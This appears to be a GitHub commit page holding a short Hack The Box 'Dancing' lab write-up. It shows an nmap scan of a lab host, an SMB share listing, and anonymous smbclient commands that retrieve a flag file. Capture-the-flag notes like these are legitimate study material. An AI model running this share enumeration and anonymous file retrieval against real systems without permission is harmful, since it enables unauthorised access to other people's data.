Skip to content

Commit 80f069e

Browse files
committed
Starting point/dancing
1 parent a5d0d32 commit 80f069e

File tree

1 file changed

+45
-0
lines changed

1 file changed

+45
-0
lines changed

htb/starting-point/dancing/README.md

+45
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,45 @@
1+
10.129.1.12
2+
3+
# nmap
4+
nmap -A 10.129.1.12
5+
6+
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-24 03:56 UTC
7+
Nmap scan report for 10.129.1.12
8+
Host is up (0.060s latency).
9+
Not shown: 997 closed tcp ports (conn-refused)
10+
PORT STATE SERVICE VERSION
11+
135/tcp open msrpc Microsoft Windows RPC
12+
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
13+
445/tcp open microsoft-ds?
14+
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
15+
16+
Host script results:
17+
| smb2-time:
18+
| date: 2024-08-24T07:56:18
19+
|_ start_date: N/A
20+
| smb2-security-mode:
21+
| 3:1:1:
22+
|_ Message signing enabled but not required
23+
|_clock-skew: 3h59m57s
24+
25+
# smbclient
26+
27+
smbclient -L 10.129.1.12
28+
Password for [WORKGROUP\kali]:
29+
30+
Sharename Type Comment
31+
--------- ---- -------
32+
ADMIN$ Disk Remote Admin
33+
C$ Disk Default share
34+
IPC$ IPC Remote IPC
35+
WorkShares Disk
36+
Reconnecting with SMB1 for workgroup listing.
37+
do_connect: Connection to 10.129.1.12 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
38+
Unable to connect with SMB1 -- no workgroup available
39+
40+
# flag
41+
42+
smbclient -N //10.129.1.12/WorkShares
43+
l
44+
cd James
45+
get flag.txt

0 commit comments

Comments
 (0)